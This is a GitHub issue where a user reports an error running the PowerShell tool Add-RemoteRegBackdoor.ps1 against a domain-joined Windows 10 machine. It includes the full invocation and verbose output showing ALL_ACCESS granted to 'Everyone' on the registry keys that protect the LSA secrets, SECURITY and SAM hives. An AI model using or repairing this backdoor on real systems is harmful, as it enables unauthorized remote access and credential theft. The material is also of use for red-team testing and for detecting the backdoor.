The property 'DACL' cannot be found on this object. Verify that the property exists and can be set.

Open tuv7041 opened this issue 4 years ago • 0 comments

Hi, I'm trying Add-RemoteRegBackdoor.ps1 on a domain-joined Windows 10 machine, and I get the following error on all registry keys:

The property 'DACL' cannot be found on this object. Verify that the property exists and can be set.

Any idea on what might be wrong? I'm attaching the output, but GitHub's Markdown makes it difficult to read. Here's the paste just in case: https://pastebin.com/sbZVfwmn

Thanks!

```
PS Microsoft.PowerShell.Core\FileSystem::\DAMP> Add-RemoteRegBackdoor -Trustee 'S-1-1-0' -ComputerName DESKTOP-13DT5NH -Verbose
VERBOSE: [DESKTOP-13DT5NH : ] Using trustee username 'Everyone'
Get-WMIObject : The RPC server is unavailable. (Exception from HRESULT: 0x800706BA)
At \vmware-host\Shared Folders\share\DAMP\Add-RemoteRegBackdoor.ps1:185 char:36
+ ... iceObject = Get-WMIObject -Class Win32_Service -Filter "name='RemoteR ...
+             ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo : InvalidOperation: (:) [Get-WmiObject], COMException
    + FullyQualifiedErrorId : GetWMICOMException,Microsoft.PowerShell.Commands.GetWmiObjectCommand

VERBOSE: [DESKTOP-13DT5NH] Remote registry is not running, attempting to start
Add-RemoteRegBackdoor : [DESKTOP-13DT5NH] Error interacting with the remote registry service: You cannot call a method on a null-valued expression.
At line:1 char:1
+ Add-RemoteRegBackdoor -Trustee 'S-1-1-0' -ComputerName DESKTOP-16QT4E ...
    + CategoryInfo          : NotSpecified: (:) [Write-Error], WriteErrorException
    + FullyQualifiedErrorId : Microsoft.PowerShell.Commands.WriteErrorException,Add-RemoteRegBackdoor

PS Microsoft.PowerShell.Core\FileSystem::\vmware-host\Shared Folders\share\DAMP> Add-RemoteRegBackdoor -Trustee 'S-1-1-0' -ComputerName DESKTOP-13DT5NH -Verbose
VERBOSE: [DESKTOP-13DT5NH : ] Using trustee username 'Everyone'
VERBOSE: [DESKTOP-13DT5NH] Remote registry is not running, attempting to start
VERBOSE: [DESKTOP-13DT5NH] Attaching to remote registry through StdRegProv
VERBOSE: [DESKTOP-13DT5NH : SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg] Backdooring started for key
VERBOSE: [DESKTOP-13DT5NH : SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg] Creating ACE with Access Mask of 983103 (ALL_ACCESS) and AceFlags of 2 (CONTAINER_INHERIT_ACE)
VERBOSE: [DESKTOP-13DT5NH : SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg] Creating the trustee WMI object with user 'Everyone'
VERBOSE: [DESKTOP-13DT5NH : SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg] Applying Trustee to new Ace
The property 'DACL' cannot be found on this object. Verify that the property exists and can be set.
At \vmware-host\Shared Folders\share\DAMP\Add-RemoteRegBackdoor.ps1:246 char:13
+         $RegSD.DACL += $RegAce.PSObject.ImmediateBaseObject
+         ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo : InvalidOperation: (:) [], RuntimeException
    + FullyQualifiedErrorId : PropertyNotFound

VERBOSE: [DESKTOP-13DT5NH : SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg] Calling SetSecurityDescriptor on the key with the newly created Ace
VERBOSE: [DESKTOP-13DT5NH : SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg] Backdooring completed for key
VERBOSE: [DESKTOP-13DT5NH : SYSTEM\CurrentControlSet\Control\Lsa\JD] Backdooring started for key
VERBOSE: [DESKTOP-13DT5NH : SYSTEM\CurrentControlSet\Control\Lsa\JD] Creating ACE with Access Mask of 983103 (ALL_ACCESS) and AceFlags of 2 (CONTAINER_INHERIT_ACE)
VERBOSE: [DESKTOP-13DT5NH : SYSTEM\CurrentControlSet\Control\Lsa\JD] Creating the trustee WMI object with user 'Everyone'
VERBOSE: [DESKTOP-13DT5NH : SYSTEM\CurrentControlSet\Control\Lsa\JD] Applying Trustee to new Ace
The property 'DACL' cannot be found on this object. Verify that the property exists and can be set.
At \vmware-host\Shared Folders\share\DAMP\Add-RemoteRegBackdoor.ps1:246 char:13
+         $RegSD.DACL += $RegAce.PSObject.ImmediateBaseObject
+         ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo : InvalidOperation: (:) [], RuntimeException
    + FullyQualifiedErrorId : PropertyNotFound

VERBOSE: [DESKTOP-13DT5NH : SYSTEM\CurrentControlSet\Control\Lsa\JD] Calling SetSecurityDescriptor on the key with the newly created Ace
VERBOSE: [DESKTOP-13DT5NH : SYSTEM\CurrentControlSet\Control\Lsa\JD] Backdooring completed for key
VERBOSE: [DESKTOP-13DT5NH : SYSTEM\CurrentControlSet\Control\Lsa\Skew1] Backdooring started for key
VERBOSE: [DESKTOP-13DT5NH : SYSTEM\CurrentControlSet\Control\Lsa\Skew1] Creating ACE with Access Mask of 983103 (ALL_ACCESS) and AceFlags of 2 (CONTAINER_INHERIT_ACE)
VERBOSE: [DESKTOP-13DT5NH : SYSTEM\CurrentControlSet\Control\Lsa\Skew1] Creating the trustee WMI object with user 'Everyone'
VERBOSE: [DESKTOP-13DT5NH : SYSTEM\CurrentControlSet\Control\Lsa\Skew1] Applying Trustee to new Ace
The property 'DACL' cannot be found on this object. Verify that the property exists and can be set.
At \vmware-host\Shared Folders\share\DAMP\Add-RemoteRegBackdoor.ps1:246 char:13
+         $RegSD.DACL += $RegAce.PSObject.ImmediateBaseObject
+         ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo : InvalidOperation: (:) [], RuntimeException
    + FullyQualifiedErrorId : PropertyNotFound

VERBOSE: [DESKTOP-13DT5NH : SYSTEM\CurrentControlSet\Control\Lsa\Skew1] Calling SetSecurityDescriptor on the key with the newly created Ace
VERBOSE: [DESKTOP-13DT5NH : SYSTEM\CurrentControlSet\Control\Lsa\Skew1] Backdooring completed for key
VERBOSE: [DESKTOP-13DT5NH : SYSTEM\CurrentControlSet\Control\Lsa\Data] Backdooring started for key
VERBOSE: [DESKTOP-13DT5NH : SYSTEM\CurrentControlSet\Control\Lsa\Data] Creating ACE with Access Mask of 983103 (ALL_ACCESS) and AceFlags of 2 (CONTAINER_INHERIT_ACE)
VERBOSE: [DESKTOP-13DT5NH : SYSTEM\CurrentControlSet\Control\Lsa\Data] Creating the trustee WMI object with user 'Everyone'
VERBOSE: [DESKTOP-13DT5NH : SYSTEM\CurrentControlSet\Control\Lsa\Data] Applying Trustee to new Ace
The property 'DACL' cannot be found on this object. Verify that the property exists and can be set.
At \vmware-host\Shared Folders\share\DAMP\Add-RemoteRegBackdoor.ps1:246 char:13
+         $RegSD.DACL += $RegAce.PSObject.ImmediateBaseObject
+         ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo : InvalidOperation: (:) [], RuntimeException
    + FullyQualifiedErrorId : PropertyNotFound

VERBOSE: [DESKTOP-13DT5NH : SYSTEM\CurrentControlSet\Control\Lsa\Data] Calling SetSecurityDescriptor on the key with the newly created Ace
VERBOSE: [DESKTOP-13DT5NH : SYSTEM\CurrentControlSet\Control\Lsa\Data] Backdooring completed for key
VERBOSE: [DESKTOP-13DT5NH : SYSTEM\CurrentControlSet\Control\Lsa\GBG] Backdooring started for key
VERBOSE: [DESKTOP-13DT5NH : SYSTEM\CurrentControlSet\Control\Lsa\GBG] Creating ACE with Access Mask of 983103 (ALL_ACCESS) and AceFlags of 2 (CONTAINER_INHERIT_ACE)
VERBOSE: [DESKTOP-13DT5NH : SYSTEM\CurrentControlSet\Control\Lsa\GBG] Creating the trustee WMI object with user 'Everyone'
VERBOSE: [DESKTOP-13DT5NH : SYSTEM\CurrentControlSet\Control\Lsa\GBG] Applying Trustee to new Ace
The property 'DACL' cannot be found on this object. Verify that the property exists and can be set.
At \vmware-host\Shared Folders\share\DAMP\Add-RemoteRegBackdoor.ps1:246 char:13
+         $RegSD.DACL += $RegAce.PSObject.ImmediateBaseObject
+         ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo : InvalidOperation: (:) [], RuntimeException
    + FullyQualifiedErrorId : PropertyNotFound

VERBOSE: [DESKTOP-13DT5NH : SYSTEM\CurrentControlSet\Control\Lsa\GBG] Calling SetSecurityDescriptor on the key with the newly created Ace
VERBOSE: [DESKTOP-13DT5NH : SYSTEM\CurrentControlSet\Control\Lsa\GBG] Backdooring completed for key
VERBOSE: [DESKTOP-13DT5NH : SECURITY] Backdooring started for key
VERBOSE: [DESKTOP-13DT5NH : SECURITY] Creating ACE with Access Mask of 983103 (ALL_ACCESS) and AceFlags of 2 (CONTAINER_INHERIT_ACE)
VERBOSE: [DESKTOP-13DT5NH : SECURITY] Creating the trustee WMI object with user 'Everyone'
VERBOSE: [DESKTOP-13DT5NH : SECURITY] Applying Trustee to new Ace
The property 'DACL' cannot be found on this object. Verify that the property exists and can be set.
At \vmware-host\Shared Folders\share\DAMP\Add-RemoteRegBackdoor.ps1:246 char:13
+         $RegSD.DACL += $RegAce.PSObject.ImmediateBaseObject
+         ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo : InvalidOperation: (:) [], RuntimeException
    + FullyQualifiedErrorId : PropertyNotFound

VERBOSE: [DESKTOP-13DT5NH : SECURITY] Calling SetSecurityDescriptor on the key with the newly created Ace
VERBOSE: [DESKTOP-13DT5NH : SECURITY] Backdooring completed for key
VERBOSE: [DESKTOP-13DT5NH : SAM\SAM\Domains\Account] Backdooring started for key
VERBOSE: [DESKTOP-13DT5NH : SAM\SAM\Domains\Account] Creating ACE with Access Mask of 983103 (ALL_ACCESS) and AceFlags of 2 (CONTAINER_INHERIT_ACE)
VERBOSE: [DESKTOP-13DT5NH : SAM\SAM\Domains\Account] Creating the trustee WMI object with user 'Everyone'
VERBOSE: [DESKTOP-13DT5NH : SAM\SAM\Domains\Account] Applying Trustee to new Ace
The property 'DACL' cannot be found on this object. Verify that the property exists and can be set.
At \vmware-host\Shared Folders\share\DAMP\Add-RemoteRegBackdoor.ps1:246 char:13
+         $RegSD.DACL += $RegAce.PSObject.ImmediateBaseObject
+         ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo : InvalidOperation: (:) [], RuntimeException
    + FullyQualifiedErrorId : PropertyNotFound

VERBOSE: [DESKTOP-13DT5NH : SAM\SAM\Domains\Account] Calling SetSecurityDescriptor on the key with the newly created Ace
VERBOSE: [DESKTOP-13DT5NH : SAM\SAM\Domains\Account] Backdooring completed for key
VERBOSE: [DESKTOP-13DT5NH] Backdooring completed for system

ComputerName    BackdoorTrustee
DESKTOP-13DT5NH S-1-1-0
```

tuv7041 • Apr 14 '20 21:04